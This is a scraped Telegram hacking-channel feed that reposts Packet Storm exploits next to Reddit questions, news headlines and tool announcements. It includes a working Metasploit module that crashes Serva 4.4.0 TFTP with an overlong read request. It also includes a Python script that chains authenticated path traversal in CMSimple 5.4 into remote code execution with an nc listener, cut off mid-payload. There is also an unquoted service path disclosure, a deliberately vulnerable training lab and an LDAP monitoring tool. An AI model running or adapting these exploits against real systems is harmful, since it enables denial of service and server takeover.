Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Creating your own C2 Framework

Has anybody here any experience on the matter? I am creating one for my university Thesis and i don't know where to start. I am good at programming, can somebody give me a small guide on where to start, what to expect, what languages to use etc. Thanks in advance.

submitted by /u/JuicyNatural
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Getting backup of whatsapp and maybe even notes ..

I need help… please … So i lost my oneplus some months ago and i dont know about backup and stuff …. I actually lost it months ago … i have done a lil research … all i have is maybe phone details like model number and stuff and the number i used for whatsapp … if it is possible to grt those chats by a number … please tell me … please I have many important things in that … please

submitted by /u/anotherweeb-_-
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Serva 4.4.0 TFTP Remote Buffer Overflow

https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
The Serva TFTP server version 4.4.0 can be brought down by sending a special Read request.

MD5 | 75523ccfe4170ca41342bbd1293163fb

Download
# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
Rank = ExcellentRanking

def initialize(info = {})
super(update_info(info,
'Name' => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
'Description' => %q{
The Serva TFTP server version 4.4.0 can be
brought down by sending a special Read request.
},
'Author' => 'Yehia Elghaly',
'License' => MSF_LICENSE,
'DisclosureDate' => '2021-11-23'))

register_options([Opt::RPORT(69)])
end

def run
connect_udp
print_status("Sending Read request...")
sploit = "\x00\x01"
sploit += "A" * 257
sploit += "\x00"
sploit += "netascii"
sploit += "\x00"
udp_sock.put(sploit)
disconnect_udp
end
end

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CMSimple 5.4 Local File Inclusion / Remote Code Execution

https://2.bp.blogspot.com/-NrOPg3Mty0U/WWlvlwk6sbI/AAAAAAAAIRI/oNtlpfQhQf0CXQthUyFzuVS3vq_pC_VnACLcBGAs/s1600/hack_img2.png
CMSimple version 5.4 local file inclusion to remote code execution exploit.

MD5 | 7d206d745fd2639b990408dc45a77919

Download
# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
# Date: 11/15/2021
# Exploit Author: S1lv3r
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/
# Version: CMSimple 5.4
# Tested on: CMSimple 5.4

# writeup:
# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities

#!/usr/bin/python3
import requests
import threading
import datetime
import sys
from bs4 import BeautifulSoup
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
Time = x + addSeconds

proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",}
def Login():
try:
global Time
s = requests.Session()
headers= {"Content-Type": "application/x-www-form-urlencoded"}

data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login'

response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies
if response.cookies['passwd']:
print("(+) Sucessfully Logged In With " + User + ":" + Password)

cookies = response.cookies
params = (('file', 'config'),('action', 'array'),)
response = s.get(RHOST ,cookies=cookies ,params=params,verify=False)
soup = BeautifulSoup(response.text, 'lxml')
CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value']
print("(+) Get CSRF Token : [ " + CsrfValue + " ]")
data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save'
response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False)
print("(+) Changing Functions file Done ")
print("(+) Check Your nc listner on " + LPORT)
except Exception as error:
print("Error, Exiting;( ")
print(error)
pass
def fuzz():
while True:
try:
sessionName = "S1lv3r"
cookies = {'PHPSESSID': sessionName}
files = {'PHP_SESSION_UPLOAD_PROGRESS':(None,
'
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
HTTPDebuggerPro 9.11 Unquoted Service Path

https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
HTTPDebuggerPro version 9.11 suffers from an unquoted service path vulnerability.

MD5 | 15b26d961cda9e9ff6659150b6459669

Download
# Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path
# Exploit Author: Aryan Chehreghani
# Date: 23/11/2021
# Vendor Homepage: https://www.httpdebugger.com
# Software Link: https://www.httpdebugger.com/download.html
# Version: 9.11
# Tested on: Windows 10 x64

SERVICE_NAME: HTTPDebuggerPro
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HTTP Debugger Pro
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
When Will Security Frameworks Catch Up With the New Cybersecurity Normal?

Standards need to reflect that most endpoints will be remote and/or wireless.
Dark Reading: Attacks/Breaches
In Appreciation: Dark Reading's Tim Wilson

Dark Reading co-founder and editor-in-chief Tim Wilson passed away on Nov. 23.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
TIWAP : Totally Insecure Web Application Project

TIWAP is a web security testing lab made using Flask for budding security enthusiasts to learn about various web vulnerabilities. Inspired by DVWA, the contributors have tried their best to regenerate various web vulnerabilities

The application is solely made for educational purpose and to learn web hacking in a legal environment.

Setup and Installation

To keep the installation and setup easy, we have configured everything for you. All you need is Docker on your system.

Once you are done with docker installation, run the following commands.

git clone https://github.com/tombstoneghost/TIWAP
cd TIWAP
docker-compose up

Note: It works only on Linux as of now and windows compatibility is work under progress

Once the lab is started, you can log in using the default credentials.
Username: admin
Password: admin

Tech Stack

Front-End: HTML, CSS and JavaScript
Back-End: Python – Flask
Databases: SQLite3 and MongoDB

Vulnerabilities

Currently, we have 20 vulnerabilities in the lab. All listed below:

* SQL Injection
* Blind SQL Injection
* NoSQL Injection
* Command Injection
* Business Logic Flaw
* Sensitive Data Exposure
* XML External Entities
* Security Misconfiguration
* Reflected XSS
* Stored XSS
* DOM Based XSS
* HTML Injection
* Improper Certificate Validation
* Hardcoded Credentials
* Insecure File Upload
* Brute Force
* Directory Traversal
* Cross-Site Request Forgery (CSRF)
* Server-Side Request Forgery (SSRF)
* Server-Side Template Injection (SSTI)

Each vulnerability is having 3 difficulty levels, namely Low, Medium and Hard. These levels can be set from the settings page.
Download
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
LDAPmonitor : Monitor Creation, Deletion And Changes To LDAP Objects Live During Your Pentest Or System Administration!

LDAPmonitor is a Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!

With this tool you can quickly see if your attack worked and if it changed LDAP attributes of the target object.
https://blogger.googleusercontent.com/img/a/AVvXsEgX2dkXzWuz7UoCzJIkBR7qrw5pgVoqi-mjjX_L9D_3hrRiDpyNqyl3Qsa9iQhAHs62QaSWC4H5z_dtq2fIpPv03ndMLG-jdeFFZMwGRlKbDd6ZuUbHNe1Wmp84ll_swuKK9J9GieFgwWMV6QwUpxv7ZwcLOF2ly3NglEmNcK1v3ofHwiuK5mACcZmA=s1554
Features
FeaturePython (.py)CSharp (.exe)Powershell (.ps1)LDAPS supporthttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Random delay in seconds between querieshttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Custom delay in seconds between querieshttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Save output to logfilehttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Colored or not colored output with --no-colorshttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/274c.png https://s.w.org/images/core/emoji/13.1.0/72x72/274c.png Custom page size for paged querieshttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Authenticate with user and passwordhttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Authenticate as current shell userhttps://s.w.org/images/core/emoji/13.1.0/72x72/274c.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Authenticate with LM:NT hasheshttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/274c.png https://s.w.org/images/core/emoji/13.1.0/72x72/274c.png Authenticate with kerberos ticketshttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/274c.png https://s.w.org/images/core/emoji/13.1.0/72x72/274c.png Option to ignore user logon eventshttps://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png https://s.w.org/images/core/emoji/13.1.0/72x72/2714.png Typical use cases

Here is a few use cases where this tool can be useful:

* Detect account lockout in real time
https://blogger.googleusercontent.com/img/a/AVvXsEgyRrK65PsF8ETZv4OjaaYzowcN7LCzvc5GwxmcWSic3a4Yu5VCqrEbGd1lE-fcx2LlbnMy1hzP-9sK8rdrALZmKJnO7Z-jobM65AVnwXwsonzFUy33XdIifycE48JUVgnDnLizKm0Otd9O7AKmOvn9kFD24Y31Rv4Zr432d9SL1RWCW0AQwpvElmy7=s1857
* Check if your privilege escalation worked (with ntlmrelay’s --escalate-useroption) * Detect when users are login in to know when to start a network poisoning.
https://blogger.googleusercontent.com/img/a/AVvXsEj_LDk_5v07owY5OEA3HXhyYqFjJ2NFF8ACUw2MPwaovhZKuqg4WogPDmmEV6rXKBdz-eTX7qL6tSa6MH-IITHHSZhQZYwTxbtu816Miem6WU32aHromKdBkUPBQ2ej7kl_an2yr6oHgddZO2qPGCUZRP5hGc8NZxrGEJHHXFWHAtmjuVQduajBmWt2=s1156
Cross platform In Python (.py)
https://blogger.googleusercontent.com/img/a/AVvXsEgq7Ny8GcngvVKoYMVxF0cav862mrKkfCMfjM9w68OlyCAtEpaMnjooLoXrhC4zIjbFp7OpwSRdi4RGkAKPPSZYVLUX4zV2-pSmOsTJh7CdfcTGO4WNiCAJj6CZKFD4zyROtPojBObnrmBPTZxcihrr[...]